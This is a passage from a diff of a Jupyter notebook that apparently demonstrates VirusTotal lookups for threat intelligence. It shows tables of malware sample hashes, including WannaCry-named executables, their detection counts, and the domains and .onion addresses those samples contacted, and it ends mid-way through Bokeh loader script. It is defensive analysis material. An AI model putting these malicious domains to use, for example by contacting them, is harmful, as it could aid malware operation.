+       "06c676bf8f5c6af99172c1cf63a84348628ae3f39df9e523c42447e2045e00ff        Win32 EXE   \n",
+       "070f603e0443b1fae57425210fb3b27c2f77d8983cfefefb0ee185de572df33d        Win32 EXE   \n",
+       "...                                                                           ...   \n",
+       "f1aa23299987eed2173e83d26b6078232051f885586ebba35699143b83bc68ad        Win32 EXE   \n",
+       "f2916486e380d0c0bbd31694b05509b91f0f622478595eba89b30031f9f64c3c        Win32 EXE   \n",
+       "fbf74ee5d011dfb0d6c3357446ea3999ef62b088c553d665847aece28a1d3e2b        Win32 EXE   \n",
+       "ff6af3f113f61f823e422b7eb9e379495b81bdbb66a4e4e159b4caee8a79bada        Win32 EXE   \n",
+       "0d592a8d7e13210140f106a897a211b839608c2e9e86f20419e30d4087b7ac03        Win32 EXE   \n",
+       "\n",
+       "                                                                  first_submission_date  \\\n",
+       "id                                                                                        \n",
+       "018ac8f95d5e14b92011cdbfc8c48056ca4891161ed6bdd268770a5b56bb327f             1495139411   \n",
+       "02a7977d1faf7bfc93a4b678a049c9495ea663e7065aa5a6caf0f69c5ff25dbd             1570020111   \n",
+       "06b020a3fd3296bc4c7bf53307fe7b40638e7f445bdd43fac1d04547a429fdaf             1588342161   \n",
+       "06c676bf8f5c6af99172c1cf63a84348628ae3f39df9e523c42447e2045e00ff             1595479073   \n",
+       "070f603e0443b1fae57425210fb3b27c2f77d8983cfefefb0ee185de572df33d             1504687270   \n",
+       "...                                                                                 ...   \n",
+       "f1aa23299987eed2173e83d26b6078232051f885586ebba35699143b83bc68ad             1563994865   \n",
+       "f2916486e380d0c0bbd31694b05509b91f0f622478595eba89b30031f9f64c3c             1498115823   \n",
+       "fbf74ee5d011dfb0d6c3357446ea3999ef62b088c553d665847aece28a1d3e2b             1573073940   \n",
+       "ff6af3f113f61f823e422b7eb9e379495b81bdbb66a4e4e159b4caee8a79bada             1576634480   \n",
+       "0d592a8d7e13210140f106a897a211b839608c2e9e86f20419e30d4087b7ac03             1583318742   \n",
+       "\n",
+       "                                                                  detections  \\\n",
+       "id                                                                             \n",
+       "018ac8f95d5e14b92011cdbfc8c48056ca4891161ed6bdd268770a5b56bb327f          67   \n",
+       "02a7977d1faf7bfc93a4b678a049c9495ea663e7065aa5a6caf0f69c5ff25dbd          52   \n",
+       "06b020a3fd3296bc4c7bf53307fe7b40638e7f445bdd43fac1d04547a429fdaf          55   \n",
+       "06c676bf8f5c6af99172c1cf63a84348628ae3f39df9e523c42447e2045e00ff          51   \n",
+       "070f603e0443b1fae57425210fb3b27c2f77d8983cfefefb0ee185de572df33d          68   \n",
+       "...                                                                      ...   \n",
+       "f1aa23299987eed2173e83d26b6078232051f885586ebba35699143b83bc68ad          64   \n",
+       "f2916486e380d0c0bbd31694b05509b91f0f622478595eba89b30031f9f64c3c          54   \n",
+       "fbf74ee5d011dfb0d6c3357446ea3999ef62b088c553d665847aece28a1d3e2b          28   \n",
+       "ff6af3f113f61f823e422b7eb9e379495b81bdbb66a4e4e159b4caee8a79bada          22   \n",
+       "0d592a8d7e13210140f106a897a211b839608c2e9e86f20419e30d4087b7ac03          66   \n",
+       "\n",
+       "                                                                  scans  \\\n",
+       "id                                                                        \n",
+       "018ac8f95d5e14b92011cdbfc8c48056ca4891161ed6bdd268770a5b56bb327f     74   \n",
+       "02a7977d1faf7bfc93a4b678a049c9495ea663e7065aa5a6caf0f69c5ff25dbd     75   \n",
+       "06b020a3fd3296bc4c7bf53307fe7b40638e7f445bdd43fac1d04547a429fdaf     75   \n",
+       "06c676bf8f5c6af99172c1cf63a84348628ae3f39df9e523c42447e2045e00ff     76   \n",
+       "070f603e0443b1fae57425210fb3b27c2f77d8983cfefefb0ee185de572df33d     74   \n",
+       "...                                                                 ...   \n",
+       "f1aa23299987eed2173e83d26b6078232051f885586ebba35699143b83bc68ad     72   \n",
+       "f2916486e380d0c0bbd31694b05509b91f0f622478595eba89b30031f9f64c3c     69   \n",
+       "fbf74ee5d011dfb0d6c3357446ea3999ef62b088c553d665847aece28a1d3e2b     72   \n",
+       "ff6af3f113f61f823e422b7eb9e379495b81bdbb66a4e4e159b4caee8a79bada     70   \n",
+       "0d592a8d7e13210140f106a897a211b839608c2e9e86f20419e30d4087b7ac03     75   \n",
+       "\n",
+       "                                                                          first_submission  \\\n",
+       "id                                                                                           \n",
+       "018ac8f95d5e14b92011cdbfc8c48056ca4891161ed6bdd268770a5b56bb327f 2017-05-18 20:30:11+00:00   \n",
+       "02a7977d1faf7bfc93a4b678a049c9495ea663e7065aa5a6caf0f69c5ff25dbd 2019-10-02 12:41:51+00:00   \n",
+       "06b020a3fd3296bc4c7bf53307fe7b40638e7f445bdd43fac1d04547a429fdaf 2020-05-01 14:09:21+00:00   \n",
+       "06c676bf8f5c6af99172c1cf63a84348628ae3f39df9e523c42447e2045e00ff 2020-07-23 04:37:53+00:00   \n",
+       "070f603e0443b1fae57425210fb3b27c2f77d8983cfefefb0ee185de572df33d 2017-09-06 08:41:10+00:00   \n",
+       "...                                                                                    ...   \n",
+       "f1aa23299987eed2173e83d26b6078232051f885586ebba35699143b83bc68ad 2019-07-24 19:01:05+00:00   \n",
+       "f2916486e380d0c0bbd31694b05509b91f0f622478595eba89b30031f9f64c3c 2017-06-22 07:17:03+00:00   \n",
+       "fbf74ee5d011dfb0d6c3357446ea3999ef62b088c553d665847aece28a1d3e2b 2019-11-06 20:59:00+00:00   \n",
+       "ff6af3f113f61f823e422b7eb9e379495b81bdbb66a4e4e159b4caee8a79bada 2019-12-18 02:01:20+00:00   \n",
+       "0d592a8d7e13210140f106a897a211b839608c2e9e86f20419e30d4087b7ac03 2020-03-04 10:45:42+00:00   \n",
+       "\n",
+       "                                                                           last_submission  \\\n",
+       "id                                                                                           \n",
+       "018ac8f95d5e14b92011cdbfc8c48056ca4891161ed6bdd268770a5b56bb327f 2018-05-13 12:53:16+00:00   \n",
+       "02a7977d1faf7bfc93a4b678a049c9495ea663e7065aa5a6caf0f69c5ff25dbd 2019-10-18 08:24:39+00:00   \n",
+       "06b020a3fd3296bc4c7bf53307fe7b40638e7f445bdd43fac1d04547a429fdaf 2020-05-01 14:09:21+00:00   \n",
+       "06c676bf8f5c6af99172c1cf63a84348628ae3f39df9e523c42447e2045e00ff 2020-07-23 04:37:53+00:00   \n",
+       "070f603e0443b1fae57425210fb3b27c2f77d8983cfefefb0ee185de572df33d 2020-09-29 07:08:18+00:00   \n",
+       "...                                                                                    ...   \n",
+       "f1aa23299987eed2173e83d26b6078232051f885586ebba35699143b83bc68ad 2019-07-24 19:01:05+00:00   \n",
+       "f2916486e380d0c0bbd31694b05509b91f0f622478595eba89b30031f9f64c3c 2018-02-14 16:06:49+00:00   \n",
+       "fbf74ee5d011dfb0d6c3357446ea3999ef62b088c553d665847aece28a1d3e2b 2019-11-06 20:59:00+00:00   \n",
+       "ff6af3f113f61f823e422b7eb9e379495b81bdbb66a4e4e159b4caee8a79bada 2019-12-18 02:01:20+00:00   \n",
+       "0d592a8d7e13210140f106a897a211b839608c2e9e86f20419e30d4087b7ac03 2020-03-04 10:45:42+00:00   \n",
+       "\n",
+       "                                                                  type  \n",
+       "id                                                                      \n",
+       "018ac8f95d5e14b92011cdbfc8c48056ca4891161ed6bdd268770a5b56bb327f  file  \n",
+       "02a7977d1faf7bfc93a4b678a049c9495ea663e7065aa5a6caf0f69c5ff25dbd  file  \n",
+       "06b020a3fd3296bc4c7bf53307fe7b40638e7f445bdd43fac1d04547a429fdaf  file  \n",
+       "06c676bf8f5c6af99172c1cf63a84348628ae3f39df9e523c42447e2045e00ff  file  \n",
+       "070f603e0443b1fae57425210fb3b27c2f77d8983cfefefb0ee185de572df33d  file  \n",
+       "...                                                                ...  \n",
+       "f1aa23299987eed2173e83d26b6078232051f885586ebba35699143b83bc68ad  file  \n",
+       "f2916486e380d0c0bbd31694b05509b91f0f622478595eba89b30031f9f64c3c  file  \n",
+       "fbf74ee5d011dfb0d6c3357446ea3999ef62b088c553d665847aece28a1d3e2b  file  \n",
+       "ff6af3f113f61f823e422b7eb9e379495b81bdbb66a4e4e159b4caee8a79bada  file  \n",
+       "0d592a8d7e13210140f106a897a211b839608c2e9e86f20419e30d4087b7ac03  file  \n",
+       "\n",
+       "[106 rows x 11 columns]"
+      ],
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>last_submission_date</th>\n",
+       "      <th>size</th>\n",
+       "      <th>times_submitted</th>\n",
+       "      <th>meaningful_name</th>\n",
+       "      <th>type_description</th>\n",
+       "      <th>first_submission_date</th>\n",
+       "      <th>detections</th>\n",
+       "      <th>scans</th>\n",
+       "      <th>first_submission</th>\n",
+       "      <th>last_submission</th>\n",
+       "      <th>type</th>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>id</th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>018ac8f95d5e14b92011cdbfc8c48056ca4891161ed6bdd268770a5b56bb327f</th>\n",
+       "      <td>1526215996</td>\n",
+       "      <td>3723264</td>\n",
+       "      <td>6</td>\n",
+       "      <td>8479206ff1a47362199ddabebb7358d2.virus</td>\n",
+       "      <td>Win32 EXE</td>\n",
+       "      <td>1495139411</td>\n",
+       "      <td>67</td>\n",
+       "      <td>74</td>\n",
+       "      <td>2017-05-18 20:30:11+00:00</td>\n",
+       "      <td>2018-05-13 12:53:16+00:00</td>\n",
+       "      <td>file</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>02a7977d1faf7bfc93a4b678a049c9495ea663e7065aa5a6caf0f69c5ff25dbd</th>\n",
+       "      <td>1571387079</td>\n",
+       "      <td>9164800</td>\n",
+       "      <td>4</td>\n",
+       "      <td>=?UTF-8?B?572R5piT5bel5YW3566x56uv5ZCv5YqoLmV4ZQ==?=</td>\n",
+       "      <td>Win32 EXE</td>\n",
+       "      <td>1570020111</td>\n",
+       "      <td>52</td>\n",
+       "      <td>75</td>\n",
+       "      <td>2019-10-02 12:41:51+00:00</td>\n",
+       "      <td>2019-10-18 08:24:39+00:00</td>\n",
+       "      <td>file</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>06b020a3fd3296bc4c7bf53307fe7b40638e7f445bdd43fac1d04547a429fdaf</th>\n",
+       "      <td>1588342161</td>\n",
+       "      <td>3991221</td>\n",
+       "      <td>1</td>\n",
+       "      <td>Tender.pdf.exe</td>\n",
+       "      <td>Win32 EXE</td>\n",
+       "      <td>1588342161</td>\n",
+       "      <td>55</td>\n",
+       "      <td>75</td>\n",
+       "      <td>2020-05-01 14:09:21+00:00</td>\n",
+       "      <td>2020-05-01 14:09:21+00:00</td>\n",
+       "      <td>file</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>06c676bf8f5c6af99172c1cf63a84348628ae3f39df9e523c42447e2045e00ff</th>\n",
+       "      <td>1595479073</td>\n",
+       "      <td>4535704</td>\n",
+       "      <td>1</td>\n",
+       "      <td>car.exe</td>\n",
+       "      <td>Win32 EXE</td>\n",
+       "      <td>1595479073</td>\n",
+       "      <td>51</td>\n",
+       "      <td>76</td>\n",
+       "      <td>2020-07-23 04:37:53+00:00</td>\n",
+       "      <td>2020-07-23 04:37:53+00:00</td>\n",
+       "      <td>file</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>070f603e0443b1fae57425210fb3b27c2f77d8983cfefefb0ee185de572df33d</th>\n",
+       "      <td>1601363298</td>\n",
+       "      <td>3723264</td>\n",
+       "      <td>9</td>\n",
+       "      <td>lhdfrgui.exe</td>\n",
+       "      <td>Win32 EXE</td>\n",
+       "      <td>1504687270</td>\n",
+       "      <td>68</td>\n",
+       "      <td>74</td>\n",
+       "      <td>2017-09-06 08:41:10+00:00</td>\n",
+       "      <td>2020-09-29 07:08:18+00:00</td>\n",
+       "      <td>file</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>...</th>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>f1aa23299987eed2173e83d26b6078232051f885586ebba35699143b83bc68ad</th>\n",
+       "      <td>1563994865</td>\n",
+       "      <td>3723392</td>\n",
+       "      <td>1</td>\n",
+       "      <td>lhdfrgui.exe</td>\n",
+       "      <td>Win32 EXE</td>\n",
+       "      <td>1563994865</td>\n",
+       "      <td>64</td>\n",
+       "      <td>72</td>\n",
+       "      <td>2019-07-24 19:01:05+00:00</td>\n",
+       "      <td>2019-07-24 19:01:05+00:00</td>\n",
+       "      <td>file</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>f2916486e380d0c0bbd31694b05509b91f0f622478595eba89b30031f9f64c3c</th>\n",
+       "      <td>1518624409</td>\n",
+       "      <td>3676610</td>\n",
+       "      <td>5</td>\n",
+       "      <td>acdsee.ultimate.10.x.unipatch_WannaCry.exe</td>\n",
+       "      <td>Win32 EXE</td>\n",
+       "      <td>1498115823</td>\n",
+       "      <td>54</td>\n",
+       "      <td>69</td>\n",
+       "      <td>2017-06-22 07:17:03+00:00</td>\n",
+       "      <td>2018-02-14 16:06:49+00:00</td>\n",
+       "      <td>file</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>fbf74ee5d011dfb0d6c3357446ea3999ef62b088c553d665847aece28a1d3e2b</th>\n",
+       "      <td>1573073940</td>\n",
+       "      <td>3811580</td>\n",
+       "      <td>1</td>\n",
+       "      <td>Presentation.exe</td>\n",
+       "      <td>Win32 EXE</td>\n",
+       "      <td>1573073940</td>\n",
+       "      <td>28</td>\n",
+       "      <td>72</td>\n",
+       "      <td>2019-11-06 20:59:00+00:00</td>\n",
+       "      <td>2019-11-06 20:59:00+00:00</td>\n",
+       "      <td>file</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>ff6af3f113f61f823e422b7eb9e379495b81bdbb66a4e4e159b4caee8a79bada</th>\n",
+       "      <td>1576634480</td>\n",
+       "      <td>3597101</td>\n",
+       "      <td>1</td>\n",
+       "      <td>ShieldPassword.exe</td>\n",
+       "      <td>Win32 EXE</td>\n",
+       "      <td>1576634480</td>\n",
+       "      <td>22</td>\n",
+       "      <td>70</td>\n",
+       "      <td>2019-12-18 02:01:20+00:00</td>\n",
+       "      <td>2019-12-18 02:01:20+00:00</td>\n",
+       "      <td>file</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>0d592a8d7e13210140f106a897a211b839608c2e9e86f20419e30d4087b7ac03</th>\n",
+       "      <td>1583318742</td>\n",
+       "      <td>3723264</td>\n",
+       "      <td>1</td>\n",
+       "      <td>lhdfrgui.exe</td>\n",
+       "      <td>Win32 EXE</td>\n",
+       "      <td>1583318742</td>\n",
+       "      <td>66</td>\n",
+       "      <td>75</td>\n",
+       "      <td>2020-03-04 10:45:42+00:00</td>\n",
+       "      <td>2020-03-04 10:45:42+00:00</td>\n",
+       "      <td>file</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "<p>106 rows × 11 columns</p>\n",
+       "</div>"
+      ]
+     },
+     "metadata": {},
+     "execution_count": 9
+    }
+   ],
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-10-27T21:32:33.223063Z",
+     "start_time": "2020-10-27T21:31:56.013858Z"
+    }
+   }
+  },
+  {
+   "cell_type": "markdown",
+   "source": [
+    "Also, if we would like to obtain the relationships for a set of entities, we have the function `lookup_iocs_relationships`. Here also, if no `observable_column` and `observable_type` parameters are specified, the function will obtain the relationships of all the entities that are in the column `target`, and will obtain their types from the `target_type` column.\n",
+    "\n",
+    "> **Note:** it can take some time to fetch results"
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 11,
+   "source": [
+    "example_multiple_relationship_df = vt_lookup.lookup_iocs_relationships(example_relationship_df, 'contacted_domains')\r\n",
+    "example_multiple_relationship_df"
+   ],
+   "outputs": [
+    {
+     "output_type": "execute_result",
+     "data": {
+      "text/plain": [
+       "                                                                                                                   target_type  \\\n",
+       "source                                                           target                                                          \n",
+       "018ac8f95d5e14b92011cdbfc8c48056ca4891161ed6bdd268770a5b56bb327f www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com      domain   \n",
+       "02a7977d1faf7bfc93a4b678a049c9495ea663e7065aa5a6caf0f69c5ff25dbd fkksjobnn43.org                                        domain   \n",
+       "070f603e0443b1fae57425210fb3b27c2f77d8983cfefefb0ee185de572df33d www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com      domain   \n",
+       "                                                                 76jdd2ir2embyv47.onion                                 domain   \n",
+       "                                                                 xxlvbrloxvriy2c5.onion                                 domain   \n",
+       "...                                                                                                                        ...   \n",
+       "0d592a8d7e13210140f106a897a211b839608c2e9e86f20419e30d4087b7ac03 76jdd2ir2embyv47.onion                                 domain   \n",
+       "                                                                 xxlvbrloxvriy2c5.onion                                 domain   \n",
+       "                                                                 gx7ekbenv2riucmf.onion                                 domain   \n",
+       "                                                                 57g7spgrzlojinas.onion                                 domain   \n",
+       "                                                                 cwwnhwhlz52maqm7.onion                                 domain   \n",
+       "\n",
+       "                                                                                                                   source_type  \\\n",
+       "source                                                           target                                                          \n",
+       "018ac8f95d5e14b92011cdbfc8c48056ca4891161ed6bdd268770a5b56bb327f www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com        file   \n",
+       "02a7977d1faf7bfc93a4b678a049c9495ea663e7065aa5a6caf0f69c5ff25dbd fkksjobnn43.org                                          file   \n",
+       "070f603e0443b1fae57425210fb3b27c2f77d8983cfefefb0ee185de572df33d www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com        file   \n",
+       "                                                                 76jdd2ir2embyv47.onion                                   file   \n",
+       "                                                                 xxlvbrloxvriy2c5.onion                                   file   \n",
+       "...                                                                                                                        ...   \n",
+       "0d592a8d7e13210140f106a897a211b839608c2e9e86f20419e30d4087b7ac03 76jdd2ir2embyv47.onion                                   file   \n",
+       "                                                                 xxlvbrloxvriy2c5.onion                                   file   \n",
+       "                                                                 gx7ekbenv2riucmf.onion                                   file   \n",
+       "                                                                 57g7spgrzlojinas.onion                                   file   \n",
+       "                                                                 cwwnhwhlz52maqm7.onion                                   file   \n",
+       "\n",
+       "                                                                                                                    relationship_type  \n",
+       "source                                                           target                                                                \n",
+       "018ac8f95d5e14b92011cdbfc8c48056ca4891161ed6bdd268770a5b56bb327f www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com  contacted_domains  \n",
+       "02a7977d1faf7bfc93a4b678a049c9495ea663e7065aa5a6caf0f69c5ff25dbd fkksjobnn43.org                                    contacted_domains  \n",
+       "070f603e0443b1fae57425210fb3b27c2f77d8983cfefefb0ee185de572df33d www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com  contacted_domains  \n",
+       "                                                                 76jdd2ir2embyv47.onion                             contacted_domains  \n",
+       "                                                                 xxlvbrloxvriy2c5.onion                             contacted_domains  \n",
+       "...                                                                                                                               ...  \n",
+       "0d592a8d7e13210140f106a897a211b839608c2e9e86f20419e30d4087b7ac03 76jdd2ir2embyv47.onion                             contacted_domains  \n",
+       "                                                                 xxlvbrloxvriy2c5.onion                             contacted_domains  \n",
+       "                                                                 gx7ekbenv2riucmf.onion                             contacted_domains  \n",
+       "                                                                 57g7spgrzlojinas.onion                             contacted_domains  \n",
+       "                                                                 cwwnhwhlz52maqm7.onion                             contacted_domains  \n",
+       "\n",
+       "[202 rows x 3 columns]"
+      ],
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th>target_type</th>\n",
+       "      <th>source_type</th>\n",
+       "      <th>relationship_type</th>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>source</th>\n",
+       "      <th>target</th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>018ac8f95d5e14b92011cdbfc8c48056ca4891161ed6bdd268770a5b56bb327f</th>\n",
+       "      <th>www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com</th>\n",
+       "      <td>domain</td>\n",
+       "      <td>file</td>\n",
+       "      <td>contacted_domains</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>02a7977d1faf7bfc93a4b678a049c9495ea663e7065aa5a6caf0f69c5ff25dbd</th>\n",
+       "      <th>fkksjobnn43.org</th>\n",
+       "      <td>domain</td>\n",
+       "      <td>file</td>\n",
+       "      <td>contacted_domains</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th rowspan=\"3\" valign=\"top\">070f603e0443b1fae57425210fb3b27c2f77d8983cfefefb0ee185de572df33d</th>\n",
+       "      <th>www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com</th>\n",
+       "      <td>domain</td>\n",
+       "      <td>file</td>\n",
+       "      <td>contacted_domains</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>76jdd2ir2embyv47.onion</th>\n",
+       "      <td>domain</td>\n",
+       "      <td>file</td>\n",
+       "      <td>contacted_domains</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>xxlvbrloxvriy2c5.onion</th>\n",
+       "      <td>domain</td>\n",
+       "      <td>file</td>\n",
+       "      <td>contacted_domains</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>...</th>\n",
+       "      <th>...</th>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th rowspan=\"5\" valign=\"top\">0d592a8d7e13210140f106a897a211b839608c2e9e86f20419e30d4087b7ac03</th>\n",
+       "      <th>76jdd2ir2embyv47.onion</th>\n",
+       "      <td>domain</td>\n",
+       "      <td>file</td>\n",
+       "      <td>contacted_domains</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>xxlvbrloxvriy2c5.onion</th>\n",
+       "      <td>domain</td>\n",
+       "      <td>file</td>\n",
+       "      <td>contacted_domains</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>gx7ekbenv2riucmf.onion</th>\n",
+       "      <td>domain</td>\n",
+       "      <td>file</td>\n",
+       "      <td>contacted_domains</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>57g7spgrzlojinas.onion</th>\n",
+       "      <td>domain</td>\n",
+       "      <td>file</td>\n",
+       "      <td>contacted_domains</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>cwwnhwhlz52maqm7.onion</th>\n",
+       "      <td>domain</td>\n",
+       "      <td>file</td>\n",
+       "      <td>contacted_domains</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "<p>202 rows × 3 columns</p>\n",
+       "</div>"
+      ]
+     },
+     "metadata": {},
+     "execution_count": 11
+    }
+   ],
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-10-27T21:34:27.584273Z",
+     "start_time": "2020-10-27T21:32:51.976469Z"
+    }
+   }
+  },
+  {
+   "cell_type": "markdown",
+   "source": [
+    "## Simple plot of the relationships\n",
+    "We can display a simple plot of the relataionships locally but it doesn't tell us much about what\n",
+    "the nodes are and they types of relationships between them."
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 104,
+   "source": [
+    "from bokeh.io import output_notebook, show\r\n",
+    "from bokeh.plotting import figure, from_networkx\r\n",
+    "from bokeh.models import HoverTool\r\n",
+    "\r\n",
+    "graph = nx.from_pandas_edgelist(\r\n",
+    "    example_multiple_relationship_df.reset_index(),\r\n",
+    "    source=\"source\",\r\n",
+    "    target=\"target\",\r\n",
+    "    edge_attr=\"relationship_type\",\r\n",
+    ")\r\n",
+    "\r\n",
+    "plot = figure(\r\n",
+    "    title=\"Simple graph plot\", x_range=(-1.1, 1.1), y_range=(-1.1, 1.1), tools=\"hover\"\r\n",
+    ")\r\n",
+    "g_plot = from_networkx(graph, nx.spring_layout, scale=2, center=(0, 0))\r\n",
+    "plot.renderers.append(g_plot)\r\n",
+    "\r\n",
+    "output_notebook()\r\n",
+    "show(plot)"
+   ],
+   "outputs": [
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"2569\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!output.data.hasOwnProperty(EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added 